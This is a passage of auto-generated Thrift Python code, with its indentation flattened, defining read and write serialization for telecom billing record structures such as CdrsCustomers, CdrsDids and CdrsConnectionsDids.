iprot.skip(ftype)
elif fid == 22:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 23:
if ftype == TType.STRING:
self.user_agent = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 24:
if ftype == TType.DOUBLE:
self.pdd100 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 25:
if ftype == TType.DOUBLE:
self.pdd1xx = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 26:
if ftype == TType.I64:
self.i_account_debug = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 27:
if ftype == TType.I32:
self.i_protocol = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 28:
if ftype == TType.STRING:
self.release_source = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 29:
if ftype == TType.I64:
self.call_setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 30:
if ftype == TType.STRUCT:
self.lrn_cld = NullString()
self.lrn_cld.read(iprot)
else:
iprot.skip(ftype)
elif fid == 31:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
elif fid == 32:
if ftype == TType.STRUCT:
self.i_media_relay = NullInt64()
self.i_media_relay.read(iprot)
else:
iprot.skip(ftype)
elif fid == 33:
if ftype == TType.STRUCT:
self.remote_ip = NullString()
self.remote_ip.read(iprot)
else:
iprot.skip(ftype)
elif fid == 34:
if ftype == TType.STRUCT:
self.vendor_name = NullString()
self.vendor_name.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CdrsConnections')
if self.i_cdrs_connection is not None:
oprot.writeFieldBegin('i_cdrs_connection', TType.I64, 1)
oprot.writeI64(self.i_cdrs_connection)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_connection is not None:
oprot.writeFieldBegin('i_connection', TType.I64, 3)
oprot.writeI64(self.i_connection)
oprot.writeFieldEnd()
if self.result is not None:
oprot.writeFieldBegin('result', TType.I32, 4)
oprot.writeI32(self.result)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 5)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.delay is not None:
oprot.writeFieldBegin('delay', TType.DOUBLE, 6)
oprot.writeDouble(self.delay)
oprot.writeFieldEnd()
if self.duration is not None:
oprot.writeFieldBegin('duration', TType.DOUBLE, 7)
oprot.writeDouble(self.duration)
oprot.writeFieldEnd()
if self.billed_duration is not None:
oprot.writeFieldBegin('billed_duration', TType.DOUBLE, 8)
oprot.writeDouble(self.billed_duration)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 9)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.connect_time is not None:
oprot.writeFieldBegin('connect_time', TType.I64, 10)
oprot.writeI64(self.connect_time)
oprot.writeFieldEnd()
if self.disconnect_time is not None:
oprot.writeFieldBegin('disconnect_time', TType.I64, 11)
oprot.writeI64(self.disconnect_time)
oprot.writeFieldEnd()
if self.cld_out is not None:
oprot.writeFieldBegin('cld_out', TType.STRING, 12)
oprot.writeString(self.cld_out.encode('utf-8') if sys.version_info[0] == 2 else self.cld_out)
oprot.writeFieldEnd()
if self.cli_out is not None:
oprot.writeFieldBegin('cli_out', TType.STRING, 13)
oprot.writeString(self.cli_out.encode('utf-8') if sys.version_info[0] == 2 else self.cli_out)
oprot.writeFieldEnd()
if self.prefix is not None:
oprot.writeFieldBegin('prefix', TType.STRING, 14)
oprot.writeString(self.prefix.encode('utf-8') if sys.version_info[0] == 2 else self.prefix)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 15)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 16)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 17)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 18)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 19)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 20)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 21)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 22)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
if self.user_agent is not None:
oprot.writeFieldBegin('user_agent', TType.STRING, 23)
oprot.writeString(self.user_agent.encode('utf-8') if sys.version_info[0] == 2 else self.user_agent)
oprot.writeFieldEnd()
if self.pdd100 is not None:
oprot.writeFieldBegin('pdd100', TType.DOUBLE, 24)
oprot.writeDouble(self.pdd100)
oprot.writeFieldEnd()
if self.pdd1xx is not None:
oprot.writeFieldBegin('pdd1xx', TType.DOUBLE, 25)
oprot.writeDouble(self.pdd1xx)
oprot.writeFieldEnd()
if self.i_account_debug is not None:
oprot.writeFieldBegin('i_account_debug', TType.I64, 26)
oprot.writeI64(self.i_account_debug)
oprot.writeFieldEnd()
if self.i_protocol is not None:
oprot.writeFieldBegin('i_protocol', TType.I32, 27)
oprot.writeI32(self.i_protocol)
oprot.writeFieldEnd()
if self.release_source is not None:
oprot.writeFieldBegin('release_source', TType.STRING, 28)
oprot.writeString(self.release_source.encode('utf-8') if sys.version_info[0] == 2 else self.release_source)
oprot.writeFieldEnd()
if self.call_setup_time is not None:
oprot.writeFieldBegin('call_setup_time', TType.I64, 29)
oprot.writeI64(self.call_setup_time)
oprot.writeFieldEnd()
if self.lrn_cld is not None:
oprot.writeFieldBegin('lrn_cld', TType.STRUCT, 30)
self.lrn_cld.write(oprot)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 31)
self.area_name.write(oprot)
oprot.writeFieldEnd()
if self.i_media_relay is not None:
oprot.writeFieldBegin('i_media_relay', TType.STRUCT, 32)
self.i_media_relay.write(oprot)
oprot.writeFieldEnd()
if self.remote_ip is not None:
oprot.writeFieldBegin('remote_ip', TType.STRUCT, 33)
self.remote_ip.write(oprot)
oprot.writeFieldEnd()
if self.vendor_name is not None:
oprot.writeFieldBegin('vendor_name', TType.STRUCT, 34)
self.vendor_name.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CdrsCustomers(object):
"""
Attributes:
- i_cdrs_customer
- i_cdr
- i_customer
- cost
- billed_duration
- prefix
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- connect_fee
- free_seconds
- grace_period
- i_call
- i_wholesaler
- setup_time
- duration
- area_name
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_cdrs_customer', None, None, ), # 1
(2, TType.I64, 'i_cdr', None, None, ), # 2
(3, TType.I64, 'i_customer', None, None, ), # 3
(4, TType.DOUBLE, 'cost', None, None, ), # 4
(5, TType.DOUBLE, 'billed_duration', None, None, ), # 5
(6, TType.STRING, 'prefix', 'UTF8', None, ), # 6
(7, TType.DOUBLE, 'price_1', None, None, ), # 7
(8, TType.DOUBLE, 'price_n', None, None, ), # 8
(9, TType.I32, 'interval_1', None, None, ), # 9
(10, TType.I32, 'interval_n', None, None, ), # 10
(11, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 11
(12, TType.DOUBLE, 'connect_fee', None, None, ), # 12
(13, TType.I32, 'free_seconds', None, None, ), # 13
(14, TType.I32, 'grace_period', None, None, ), # 14
(15, TType.I64, 'i_call', None, None, ), # 15
(16, TType.I64, 'i_wholesaler', None, None, ), # 16
(17, TType.I64, 'setup_time', None, None, ), # 17
(18, TType.DOUBLE, 'duration', None, None, ), # 18
(19, TType.STRUCT, 'area_name', (NullString, NullString.thrift_spec), None, ), # 19
)
def __init__(self, i_cdrs_customer=None, i_cdr=None, i_customer=None, cost=None, billed_duration=None, prefix=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, connect_fee=None, free_seconds=None, grace_period=None, i_call=None, i_wholesaler=None, setup_time=None, duration=None, area_name=None,):
self.i_cdrs_customer = i_cdrs_customer
self.i_cdr = i_cdr
self.i_customer = i_customer
self.cost = cost
self.billed_duration = billed_duration
self.prefix = prefix
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.free_seconds = free_seconds
self.grace_period = grace_period
self.i_call = i_call
self.i_wholesaler = i_wholesaler
self.setup_time = setup_time
self.duration = duration
self.area_name = area_name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_cdrs_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_cdr = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_customer = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.DOUBLE:
self.billed_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.STRING:
self.prefix = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.I64:
self.i_wholesaler = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.DOUBLE:
self.duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.STRUCT:
self.area_name = NullString()
self.area_name.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CdrsCustomers')
if self.i_cdrs_customer is not None:
oprot.writeFieldBegin('i_cdrs_customer', TType.I64, 1)
oprot.writeI64(self.i_cdrs_customer)
oprot.writeFieldEnd()
if self.i_cdr is not None:
oprot.writeFieldBegin('i_cdr', TType.I64, 2)
oprot.writeI64(self.i_cdr)
oprot.writeFieldEnd()
if self.i_customer is not None:
oprot.writeFieldBegin('i_customer', TType.I64, 3)
oprot.writeI64(self.i_customer)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 4)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.billed_duration is not None:
oprot.writeFieldBegin('billed_duration', TType.DOUBLE, 5)
oprot.writeDouble(self.billed_duration)
oprot.writeFieldEnd()
if self.prefix is not None:
oprot.writeFieldBegin('prefix', TType.STRING, 6)
oprot.writeString(self.prefix.encode('utf-8') if sys.version_info[0] == 2 else self.prefix)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 7)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 8)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 9)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 10)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 11)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 12)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 13)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 14)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 15)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_wholesaler is not None:
oprot.writeFieldBegin('i_wholesaler', TType.I64, 16)
oprot.writeI64(self.i_wholesaler)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 17)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.duration is not None:
oprot.writeFieldBegin('duration', TType.DOUBLE, 18)
oprot.writeDouble(self.duration)
oprot.writeFieldEnd()
if self.area_name is not None:
oprot.writeFieldBegin('area_name', TType.STRUCT, 19)
self.area_name.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CdrsDids(object):
"""
Attributes:
- i_cdrs_did
- i_call
- i_did
- did
- result
- cost
- duration
- billed_duration
- setup_time
- connect_time
- disconnect_time
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- connect_fee
- free_seconds
- grace_period
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_cdrs_did', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.I64, 'i_did', None, None, ), # 3
(4, TType.STRING, 'did', 'UTF8', None, ), # 4
(5, TType.I32, 'result', None, None, ), # 5
(6, TType.DOUBLE, 'cost', None, None, ), # 6
(7, TType.DOUBLE, 'duration', None, None, ), # 7
(8, TType.DOUBLE, 'billed_duration', None, None, ), # 8
(9, TType.I64, 'setup_time', None, None, ), # 9
(10, TType.I64, 'connect_time', None, None, ), # 10
(11, TType.I64, 'disconnect_time', None, None, ), # 11
(12, TType.DOUBLE, 'price_1', None, None, ), # 12
(13, TType.DOUBLE, 'price_n', None, None, ), # 13
(14, TType.I32, 'interval_1', None, None, ), # 14
(15, TType.I32, 'interval_n', None, None, ), # 15
(16, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 16
(17, TType.DOUBLE, 'connect_fee', None, None, ), # 17
(18, TType.I32, 'free_seconds', None, None, ), # 18
(19, TType.I32, 'grace_period', None, None, ), # 19
)
def __init__(self, i_cdrs_did=None, i_call=None, i_did=None, did=None, result=None, cost=None, duration=None, billed_duration=None, setup_time=None, connect_time=None, disconnect_time=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, connect_fee=None, free_seconds=None, grace_period=None,):
self.i_cdrs_did = i_cdrs_did
self.i_call = i_call
self.i_did = i_did
self.did = did
self.result = result
self.cost = cost
self.duration = duration
self.billed_duration = billed_duration
self.setup_time = setup_time
self.connect_time = connect_time
self.disconnect_time = disconnect_time
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.free_seconds = free_seconds
self.grace_period = grace_period
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_cdrs_did = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_did = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.I32:
self.result = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.DOUBLE:
self.duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.DOUBLE:
self.billed_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.I64:
self.connect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.I64:
self.disconnect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CdrsDids')
if self.i_cdrs_did is not None:
oprot.writeFieldBegin('i_cdrs_did', TType.I64, 1)
oprot.writeI64(self.i_cdrs_did)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
oprot.writeFieldEnd()
if self.i_did is not None:
oprot.writeFieldBegin('i_did', TType.I64, 3)
oprot.writeI64(self.i_did)
oprot.writeFieldEnd()
if self.did is not None:
oprot.writeFieldBegin('did', TType.STRING, 4)
oprot.writeString(self.did.encode('utf-8') if sys.version_info[0] == 2 else self.did)
oprot.writeFieldEnd()
if self.result is not None:
oprot.writeFieldBegin('result', TType.I32, 5)
oprot.writeI32(self.result)
oprot.writeFieldEnd()
if self.cost is not None:
oprot.writeFieldBegin('cost', TType.DOUBLE, 6)
oprot.writeDouble(self.cost)
oprot.writeFieldEnd()
if self.duration is not None:
oprot.writeFieldBegin('duration', TType.DOUBLE, 7)
oprot.writeDouble(self.duration)
oprot.writeFieldEnd()
if self.billed_duration is not None:
oprot.writeFieldBegin('billed_duration', TType.DOUBLE, 8)
oprot.writeDouble(self.billed_duration)
oprot.writeFieldEnd()
if self.setup_time is not None:
oprot.writeFieldBegin('setup_time', TType.I64, 9)
oprot.writeI64(self.setup_time)
oprot.writeFieldEnd()
if self.connect_time is not None:
oprot.writeFieldBegin('connect_time', TType.I64, 10)
oprot.writeI64(self.connect_time)
oprot.writeFieldEnd()
if self.disconnect_time is not None:
oprot.writeFieldBegin('disconnect_time', TType.I64, 11)
oprot.writeI64(self.disconnect_time)
oprot.writeFieldEnd()
if self.price_1 is not None:
oprot.writeFieldBegin('price_1', TType.DOUBLE, 12)
oprot.writeDouble(self.price_1)
oprot.writeFieldEnd()
if self.price_n is not None:
oprot.writeFieldBegin('price_n', TType.DOUBLE, 13)
oprot.writeDouble(self.price_n)
oprot.writeFieldEnd()
if self.interval_1 is not None:
oprot.writeFieldBegin('interval_1', TType.I32, 14)
oprot.writeI32(self.interval_1)
oprot.writeFieldEnd()
if self.interval_n is not None:
oprot.writeFieldBegin('interval_n', TType.I32, 15)
oprot.writeI32(self.interval_n)
oprot.writeFieldEnd()
if self.post_call_surcharge is not None:
oprot.writeFieldBegin('post_call_surcharge', TType.DOUBLE, 16)
oprot.writeDouble(self.post_call_surcharge)
oprot.writeFieldEnd()
if self.connect_fee is not None:
oprot.writeFieldBegin('connect_fee', TType.DOUBLE, 17)
oprot.writeDouble(self.connect_fee)
oprot.writeFieldEnd()
if self.free_seconds is not None:
oprot.writeFieldBegin('free_seconds', TType.I32, 18)
oprot.writeI32(self.free_seconds)
oprot.writeFieldEnd()
if self.grace_period is not None:
oprot.writeFieldBegin('grace_period', TType.I32, 19)
oprot.writeI32(self.grace_period)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class CdrsConnectionsDids(object):
"""
Attributes:
- i_cdrs_connections_did
- i_call
- i_did_authorization
- did
- incoming_did
- i_connection
- result
- cost
- duration
- billed_duration
- setup_time
- connect_time
- disconnect_time
- price_1
- price_n
- interval_1
- interval_n
- post_call_surcharge
- connect_fee
- free_seconds
- grace_period
"""
thrift_spec = (
None, # 0
(1, TType.I64, 'i_cdrs_connections_did', None, None, ), # 1
(2, TType.I64, 'i_call', None, None, ), # 2
(3, TType.I64, 'i_did_authorization', None, None, ), # 3
(4, TType.STRING, 'did', 'UTF8', None, ), # 4
(5, TType.STRING, 'incoming_did', 'UTF8', None, ), # 5
(6, TType.I64, 'i_connection', None, None, ), # 6
(7, TType.I32, 'result', None, None, ), # 7
(8, TType.DOUBLE, 'cost', None, None, ), # 8
(9, TType.DOUBLE, 'duration', None, None, ), # 9
(10, TType.DOUBLE, 'billed_duration', None, None, ), # 10
(11, TType.I64, 'setup_time', None, None, ), # 11
(12, TType.I64, 'connect_time', None, None, ), # 12
(13, TType.I64, 'disconnect_time', None, None, ), # 13
(14, TType.DOUBLE, 'price_1', None, None, ), # 14
(15, TType.DOUBLE, 'price_n', None, None, ), # 15
(16, TType.I32, 'interval_1', None, None, ), # 16
(17, TType.I32, 'interval_n', None, None, ), # 17
(18, TType.DOUBLE, 'post_call_surcharge', None, None, ), # 18
(19, TType.DOUBLE, 'connect_fee', None, None, ), # 19
(20, TType.I32, 'free_seconds', None, None, ), # 20
(21, TType.I32, 'grace_period', None, None, ), # 21
)
def __init__(self, i_cdrs_connections_did=None, i_call=None, i_did_authorization=None, did=None, incoming_did=None, i_connection=None, result=None, cost=None, duration=None, billed_duration=None, setup_time=None, connect_time=None, disconnect_time=None, price_1=None, price_n=None, interval_1=None, interval_n=None, post_call_surcharge=None, connect_fee=None, free_seconds=None, grace_period=None,):
self.i_cdrs_connections_did = i_cdrs_connections_did
self.i_call = i_call
self.i_did_authorization = i_did_authorization
self.did = did
self.incoming_did = incoming_did
self.i_connection = i_connection
self.result = result
self.cost = cost
self.duration = duration
self.billed_duration = billed_duration
self.setup_time = setup_time
self.connect_time = connect_time
self.disconnect_time = disconnect_time
self.price_1 = price_1
self.price_n = price_n
self.interval_1 = interval_1
self.interval_n = interval_n
self.post_call_surcharge = post_call_surcharge
self.connect_fee = connect_fee
self.free_seconds = free_seconds
self.grace_period = grace_period
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec), iprot.string_length_limit, iprot.container_length_limit)
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I64:
self.i_cdrs_connections_did = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I64:
self.i_call = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I64:
self.i_did_authorization = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRING:
self.did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRING:
self.incoming_did = iprot.readString().decode('utf-8') if sys.version_info[0] == 2 else iprot.readString()
else:
iprot.skip(ftype)
elif fid == 6:
if ftype == TType.I64:
self.i_connection = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 7:
if ftype == TType.I32:
self.result = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 8:
if ftype == TType.DOUBLE:
self.cost = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 9:
if ftype == TType.DOUBLE:
self.duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 10:
if ftype == TType.DOUBLE:
self.billed_duration = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 11:
if ftype == TType.I64:
self.setup_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 12:
if ftype == TType.I64:
self.connect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 13:
if ftype == TType.I64:
self.disconnect_time = iprot.readI64()
else:
iprot.skip(ftype)
elif fid == 14:
if ftype == TType.DOUBLE:
self.price_1 = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 15:
if ftype == TType.DOUBLE:
self.price_n = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 16:
if ftype == TType.I32:
self.interval_1 = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 17:
if ftype == TType.I32:
self.interval_n = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 18:
if ftype == TType.DOUBLE:
self.post_call_surcharge = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 19:
if ftype == TType.DOUBLE:
self.connect_fee = iprot.readDouble()
else:
iprot.skip(ftype)
elif fid == 20:
if ftype == TType.I32:
self.free_seconds = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 21:
if ftype == TType.I32:
self.grace_period = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('CdrsConnectionsDids')
if self.i_cdrs_connections_did is not None:
oprot.writeFieldBegin('i_cdrs_connections_did', TType.I64, 1)
oprot.writeI64(self.i_cdrs_connections_did)
oprot.writeFieldEnd()
if self.i_call is not None:
oprot.writeFieldBegin('i_call', TType.I64, 2)
oprot.writeI64(self.i_call)
